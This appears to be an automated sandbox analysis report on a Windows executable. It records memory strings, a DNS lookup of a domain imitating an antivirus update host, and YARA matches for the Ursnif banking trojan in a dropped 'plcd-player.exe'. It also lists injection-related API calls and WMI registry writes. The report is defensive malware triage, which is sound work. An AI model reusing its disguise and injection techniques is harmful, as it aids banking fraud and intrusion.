Source: unknown

DNS traffic detected: query: get.updates.avast.cn replaycode: Name error (3)

Source: o4c8AUtX1g.exe	String found in binary or memory: !LShell32.dllShlwapi.dllbinSoftware\JavaSoft\Java Runtime Environment\Software\JavaSoft\Java Development Kit\JavaHomeFlashWindowFlashWindowExKernel32.dllGetPackagePathhttp://www.yahoo.comhttp://www.google.comTESThttp://www.example.comtin9999.tmp.partattachmentHEAD "=charsetfilename123DLDutf-8POSTISO-8859-1utf-16AdvancedInstallerUS-ASCIILocal Network ServerGET/FTP ServerRange: bytes=%u- equals www.yahoo.com (Yahoo)
Source: o4c8AUtX1g.exe, 00000001.00000000.664338769.0000000001415000.00000002.00020000.sdmp	String found in binary or memory: Shell32.dllShlwapi.dllbinSoftware\JavaSoft\Java Runtime Environment\Software\JavaSoft\Java Development Kit\JavaHomeFlashWindowFlashWindowExKernel32.dllGetPackagePathhttp://www.yahoo.comhttp://www.google.comTESThttp://www.example.comtin9999.tmp.partattachmentHEAD "=charsetfilename123DLDutf-8POSTISO-8859-1utf-16AdvancedInstallerUS-ASCIILocal Network ServerGET/FTP ServerRange: bytes=%u- equals www.yahoo.com (Yahoo)

Source: o4c8AUtX1g.exe, 00000001.00000003.673805273.0000000003E90000.00000004.00000001.sdmp	String found in binary or memory: http://.css
Source: o4c8AUtX1g.exe, 00000001.00000003.673805273.0000000003E90000.00000004.00000001.sdmp	String found in binary or memory: http://.jpg
Source: o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp, ssleay32.dll.3.dr	String found in binary or memory: http://aia.startssl.com/certs/ca.crt02
Source: o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp, ssleay32.dll.3.dr	String found in binary or memory: http://aia.startssl.com/certs/sub.class2.code.ca.crt0#
Source: o4c8AUtX1g.exe, 00000001.00000003.706016324.0000000005969000.00000004.00000001.sdmp, plcd-player.exe, 00000009.00000002.934202867.0000000000CDA000.00000002.00020000.sdmp, plcd-player.exe.3.dr	String found in binary or memory: http://apache.org/xml/UnknownNSUCS4UCS-4UCS_4UTF-32ISO-10646-UCS-4UCS-4
Source: o4c8AUtX1g.exe, 00000001.00000003.706016324.0000000005969000.00000004.00000001.sdmp, plcd-player.exe, 00000009.00000002.934202867.0000000000CDA000.00000002.00020000.sdmp, plcd-player.exe.3.dr	String found in binary or memory: http://apache.org/xml/messages/XML4CErrors#FIXEDEBCDIC-CP-USIBM037IBM1047IBM-1047IBM1140IBM01140CCSI
Source: o4c8AUtX1g.exe, 00000001.00000003.706016324.0000000005969000.00000004.00000001.sdmp, plcd-player.exe, 00000009.00000002.934202867.0000000000CDA000.00000002.00020000.sdmp, plcd-player.exe.3.dr	String found in binary or memory: http://apache.org/xml/messages/XMLValidityWINDOWS-1252XERCES-XMLCHhttp://apache.org/xml/messages/XML
Source: o4c8AUtX1g.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: o4c8AUtX1g.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: o4c8AUtX1g.exe	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: o4c8AUtX1g.exe	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: o4c8AUtX1g.exe, 00000001.00000003.706113597.0000000005A36000.00000004.00000001.sdmp, AWSSDK.SimpleDB.dll.1.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: o4c8AUtX1g.exe, 00000001.00000003.706113597.0000000005A36000.00000004.00000001.sdmp, AWSSDK.SimpleDB.dll.1.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSAExtendedValidationCodeSigningCA.crl0
Source: o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp, ssleay32.dll.3.dr	String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingg2.crl0T
Source: o4c8AUtX1g.exe, 00000001.00000003.707309857.0000000003B11000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp, ssleay32.dll.3.dr	String found in binary or memory: http://crl.globalsign.net/root.crl0
Source: o4c8AUtX1g.exe	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: o4c8AUtX1g.exe	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp, icuio58.dll.3.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp, ssleay32.dll.3.dr	String found in binary or memory: http://crl.startssl.com/crtc2-crl.crl0
Source: o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp, ssleay32.dll.3.dr	String found in binary or memory: http://crl.startssl.com/sfsca.crl0C
Source: o4c8AUtX1g.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: o4c8AUtX1g.exe	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: o4c8AUtX1g.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: o4c8AUtX1g.exe	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: o4c8AUtX1g.exe	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: o4c8AUtX1g.exe	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp, icuio58.dll.3.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: o4c8AUtX1g.exe, 00000001.00000003.707309857.0000000003B11000.00000004.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: o4c8AUtX1g.exe, 00000001.00000003.673805273.0000000003E90000.00000004.00000001.sdmp	String found in binary or memory: http://html4/loose.dtd
Source: o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp, icuio58.dll.3.dr	String found in binary or memory: http://icu-project.org
Source: o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp, ssleay32.dll.3.dr	String found in binary or memory: http://mybusinesscatalog.com0
Source: o4c8AUtX1g.exe	String found in binary or memory: http://ocsp.comodoca.com0
Source: o4c8AUtX1g.exe, 00000001.00000003.706113597.0000000005A36000.00000004.00000001.sdmp, AWSSDK.SimpleDB.dll.1.dr	String found in binary or memory: http://ocsp.comodoca.com0B
Source: o4c8AUtX1g.exe	String found in binary or memory: http://ocsp.digicert.com0C
Source: o4c8AUtX1g.exe	String found in binary or memory: http://ocsp.digicert.com0O
Source: o4c8AUtX1g.exe, icuio58.dll.3.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: o4c8AUtX1g.exe	String found in binary or memory: http://ocsp.sectigo.com0)
Source: o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp, ssleay32.dll.3.dr	String found in binary or memory: http://ocsp.startssl.com/ca00
Source: o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp, ssleay32.dll.3.dr	String found in binary or memory: http://ocsp.startssl.com/sub/class2/code/ca0
Source: o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp, ssleay32.dll.3.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingg2.crt0
Source: o4c8AUtX1g.exe, 00000001.00000003.666504324.0000000003C10000.00000004.00000001.sdmp, MSI79F9.tmp.1.dr	String found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
Source: o4c8AUtX1g.exe, 00000001.00000003.666504324.0000000003C10000.00000004.00000001.sdmp, MSI79F9.tmp.1.dr	String found in binary or memory: http://t2.symcb.com0
Source: o4c8AUtX1g.exe, 00000001.00000003.666504324.0000000003C10000.00000004.00000001.sdmp, MSI79F9.tmp.1.dr	String found in binary or memory: http://tl.symcb.com/tl.crl0
Source: o4c8AUtX1g.exe, 00000001.00000003.666504324.0000000003C10000.00000004.00000001.sdmp, MSI79F9.tmp.1.dr	String found in binary or memory: http://tl.symcb.com/tl.crt0
Source: o4c8AUtX1g.exe, 00000001.00000003.666504324.0000000003C10000.00000004.00000001.sdmp, MSI79F9.tmp.1.dr	String found in binary or memory: http://tl.symcd.com0&
Source: o4c8AUtX1g.exe, 00000001.00000003.703979629.0000000005640000.00000004.00000001.sdmp, License.txt.1.dr	String found in binary or memory: http://www.MyBusinessCatalog.com
Source: o4c8AUtX1g.exe	String found in binary or memory: http://www.digicert.com/CPS0
Source: o4c8AUtX1g.exe, 00000001.00000003.703979629.0000000005640000.00000004.00000001.sdmp, ecb-eurofxref-daily.xml.3.dr	String found in binary or memory: http://www.ecb.int/vocabulary/2002-08-01/eurofxref
Source: o4c8AUtX1g.exe, 00000001.00000003.703979629.0000000005640000.00000004.00000001.sdmp, ecb-eurofxref-daily.xml.3.dr	String found in binary or memory: http://www.gesmes.org/xml/2002-08-01
Source: o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp, ssleay32.dll.3.dr	String found in binary or memory: http://www.openssl.org/V
Source: o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp	String found in binary or memory: http://www.openssl.org/support/faq.html
Source: o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp	String found in binary or memory: http://www.openssl.org/support/faq.html....................rbwb.rndC:HOMERANDFILEPRNG
Source: o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp, ssleay32.dll.3.dr	String found in binary or memory: http://www.startssl.com/0
Source: o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp, ssleay32.dll.3.dr	String found in binary or memory: http://www.startssl.com/policy.pdf0
Source: icuio58.dll.3.dr	String found in binary or memory: http://www.unicode.org/copyright.html
Source: o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp, Microsoft.Azure.KeyVault.Core.dll.1.dr	String found in binary or memory: https://aka.ms/azsdkvalueprop.
Source: currencysystem5.json.3.dr	String found in binary or memory: https://currencysystem.com
Source: o4c8AUtX1g.exe, 00000001.00000003.703979629.0000000005640000.00000004.00000001.sdmp, currencysystem4.js.3.dr	String found in binary or memory: https://currencysystem.com/gfx/pub/script-button-88x31.gif
Source: o4c8AUtX1g.exe, 00000001.00000003.703979629.0000000005640000.00000004.00000001.sdmp, currencysystem5.js.3.dr, currencysystem5.json.3.dr	String found in binary or memory: https://currencysystem.com/gfx/pub/script-button-88x31.png
Source: o4c8AUtX1g.exe, 00000001.00000003.703979629.0000000005640000.00000004.00000001.sdmp, currencysystem4.js.3.dr	String found in binary or memory: https://currencysystem.com/gfx/pub/script-icon-16x16.gif
Source: o4c8AUtX1g.exe, 00000001.00000003.703979629.0000000005640000.00000004.00000001.sdmp, currencysystem5.js.3.dr, currencysystem5.json.3.dr	String found in binary or memory: https://currencysystem.com/gfx/pub/script-icon-16x16.png
Source: o4c8AUtX1g.exe	String found in binary or memory: https://sectigo.com/CPS0
Source: o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp, icuio58.dll.3.dr	String found in binary or memory: https://sectigo.com/CPS0D
Source: o4c8AUtX1g.exe, 00000001.00000003.706113597.0000000005A36000.00000004.00000001.sdmp, AWSSDK.SimpleDB.dll.1.dr	String found in binary or memory: https://secure.comodo.com/CPS0L
Source: o4c8AUtX1g.exe, 00000001.00000003.666504324.0000000003C10000.00000004.00000001.sdmp, MSI79F9.tmp.1.dr	String found in binary or memory: https://www.advancedinstaller.com
Source: o4c8AUtX1g.exe	String found in binary or memory: https://www.digicert.com/CPS0
Source: o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp, ssleay32.dll.3.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp, ssleay32.dll.3.dr	String found in binary or memory: https://www.globalsign.com/repository/03
Source: o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp, Microsoft.Azure.KeyVault.Core.dll.1.dr	String found in binary or memory: https://www.nuget.org/packages/Azure.Security.KeyVault.Certificates
Source: o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp, Microsoft.Azure.KeyVault.Core.dll.1.dr	String found in binary or memory: https://www.nuget.org/packages/Azure.Security.KeyVault.Keys
Source: o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp, Microsoft.Azure.KeyVault.Core.dll.1.dr	String found in binary or memory: https://www.nuget.org/packages/Azure.Security.KeyVault.Secrets
Source: o4c8AUtX1g.exe, 00000001.00000003.666504324.0000000003C10000.00000004.00000001.sdmp, MSI79F9.tmp.1.dr	String found in binary or memory: https://www.thawte.com/cps0/
Source: o4c8AUtX1g.exe, 00000001.00000003.666504324.0000000003C10000.00000004.00000001.sdmp, MSI79F9.tmp.1.dr	String found in binary or memory: https://www.thawte.com/repository0W

Source: unknown

DNS traffic detected: queries for: get.updates.avast.cn

Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe

Code function: 9_2_00A903A0 RtlEnterCriticalSection,RtlLeaveCriticalSection,Sleep,select,__WSAFDIsSet,WSARecv,WSAGetLastError,RtlLeaveCriticalSection,

9_2_00A903A0

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000009.00000003.913796145.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.913762032.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.913941910.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.937726154.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.913912827.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.914001553.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.913978289.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.913841738.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.913966024.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: plcd-player.exe PID: 4744, type: MEMORYSTR
Source: Yara match	File source: 9.2.plcd-player.exe.39494a0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.plcd-player.exe.39494a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.plcd-player.exe.1270000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.937676135.0000000003949000.00000004.00000040.sdmp, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000009.00000003.913796145.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.913762032.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.913941910.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.937726154.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.913912827.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.914001553.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.913978289.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.913841738.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.913966024.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: plcd-player.exe PID: 4744, type: MEMORYSTR
Source: Yara match	File source: 9.2.plcd-player.exe.39494a0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.plcd-player.exe.39494a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.plcd-player.exe.1270000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.937676135.0000000003949000.00000004.00000040.sdmp, type: MEMORY

System Summary:

PE file has a writeable .text section

Show sources

Source: plcd-player.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: plcd-player.exe.3.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Writes or reads registry keys via WMI

Show sources

Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Show sources

Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: o4c8AUtX1g.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE

Source: C:\Windows\System32\msiexec.exe

File deleted: C:\Windows\Installer\MSI11D7.tmp

Jump to behavior

Source: C:\Windows\System32\msiexec.exe

File created: C:\Windows\Installer\440bbd.msi

Jump to behavior

Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Code function: 1_2_01342910	1_2_01342910
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Code function: 1_2_012A8740	1_2_012A8740
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Code function: 1_2_013446B0	1_2_013446B0
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Code function: 1_2_01292080	1_2_01292080
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Code function: 1_2_012AC080	1_2_012AC080
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Code function: 1_2_013038F0	1_2_013038F0
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Code function: 1_2_013D7354	1_2_013D7354
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Code function: 1_2_013C2241	1_2_013C2241
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Code function: 1_2_012A6AC0	1_2_012A6AC0
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Code function: 1_2_012BF560	1_2_012BF560
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Code function: 1_2_013D8F4E	1_2_013D8F4E
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Code function: 1_2_013D8E2E	1_2_013D8E2E
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: 9_2_00AB0130	9_2_00AB0130
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: 9_2_00ACB960	9_2_00ACB960
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: 9_2_00AA6AF0	9_2_00AA6AF0
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: 9_2_00C43483	9_2_00C43483
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: 9_2_00C344AF	9_2_00C344AF
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: 9_2_00C274B9	9_2_00C274B9
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: 9_2_00C3FC19	9_2_00C3FC19
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: 9_2_00C435A3	9_2_00C435A3
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: 9_2_00AA75D0	9_2_00AA75D0
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: 9_2_00AD5D70	9_2_00AD5D70
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: 9_2_00AAAF30	9_2_00AAAF30

Source: C:\Users\user\Desktop\o4c8AUtX1g.exe

Code function: String function: 01296990 appears 186 times

Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Code function: 1_2_0129D890 NtdllDefWindowProc_W,	1_2_0129D890
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Code function: 1_2_012A0320 NtdllDefWindowProc_W,	1_2_012A0320
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Code function: 1_2_0129D260 SysFreeString,SysAllocString,NtdllDefWindowProc_W,GlobalAlloc,GlobalLock,GlobalUnlock,SysFreeString,NtdllDefWindowProc_W,SysFreeString,	1_2_0129D260
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Code function: 1_2_012AA2E0 NtdllDefWindowProc_W,DeleteCriticalSection,	1_2_012AA2E0
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Code function: 1_2_0129FD60 NtdllDefWindowProc_W,	1_2_0129FD60
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Code function: 1_2_0129CCB0 NtdllDefWindowProc_W,GlobalAlloc,GlobalLock,GlobalUnlock,NtdllDefWindowProc_W,	1_2_0129CCB0
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Code function: 1_2_012C7CF0 NtdllDefWindowProc_W,	1_2_012C7CF0
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Code function: 1_2_012A6760 NtdllDefWindowProc_W,	1_2_012A6760
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Code function: 1_2_0129F740 NtdllDefWindowProc_W,	1_2_0129F740
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: 9_2_00A719A0 NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,GetLastError,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,	9_2_00A719A0
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: 9_2_00A71703 NtMapViewOfSection,	9_2_00A71703
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: 9_2_00A71C90 GetProcAddress,NtCreateSection,memset,	9_2_00A71C90

Source: o4c8AUtX1g.exe, 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp	Binary or memory string: OriginalFileNameplcd-player.exe> vs o4c8AUtX1g.exe
Source: o4c8AUtX1g.exe, 00000001.00000003.673805273.0000000003E90000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamewininet.dllD vs o4c8AUtX1g.exe
Source: o4c8AUtX1g.exe, 00000001.00000003.666504324.0000000003C10000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamelzmaextractor.dllF vs o4c8AUtX1g.exe
Source: o4c8AUtX1g.exe, 00000001.00000003.666504324.0000000003C10000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameAICustAct.dllF vs o4c8AUtX1g.exe
Source: o4c8AUtX1g.exe, 00000001.00000003.706113597.0000000005A36000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameJDesktop.tools vs o4c8AUtX1g.exe
Source: o4c8AUtX1g.exe, 00000001.00000003.706113597.0000000005A36000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameAWSSDK.SimpleDB.dllb! vs o4c8AUtX1g.exe
Source: o4c8AUtX1g.exe, 00000001.00000003.706113597.0000000005A36000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameDelimon.Win32.IO.dllD vs o4c8AUtX1g.exe
Source: o4c8AUtX1g.exe, 00000001.00000003.706113597.0000000005A36000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameICSharpCode.SharpZipLib.dll8 vs o4c8AUtX1g.exe
Source: o4c8AUtX1g.exe, 00000001.00000003.666756331.0000000003D73000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSoftwareDetector.dllF vs o4c8AUtX1g.exe
Source: o4c8AUtX1g.exe, 00000001.00000003.666756331.0000000003D73000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamePrereq.dllF vs o4c8AUtX1g.exe
Source: o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameicuio58.dll vs o4c8AUtX1g.exe
Source: o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameUtilities_HelperlL vs o4c8AUtX1g.exe
Source: o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamelibeay32.dllH vs o4c8AUtX1g.exe
Source: o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Azure.KeyVault.Core.dll> vs o4c8AUtX1g.exe
Source: o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSslCertBinding.Net.dllH vs o4c8AUtX1g.exe
Source: o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamessleay32.dllH vs o4c8AUtX1g.exe
Source: o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSystem.Threading.Tasks.dllP vs o4c8AUtX1g.exe
Source: o4c8AUtX1g.exe	Binary or memory string: OriginalFileNameplcd-player.exe> vs o4c8AUtX1g.exe
Source: o4c8AUtX1g.exe	Binary or memory string: OriginalFilenameDecoder.dllF vs o4c8AUtX1g.exe

Source: o4c8AUtX1g.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: plcd-player.exe.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: plcd-player.exe.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Section loaded: lpk.dll	Jump to behavior
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Section loaded: libftl2.dll	Jump to behavior

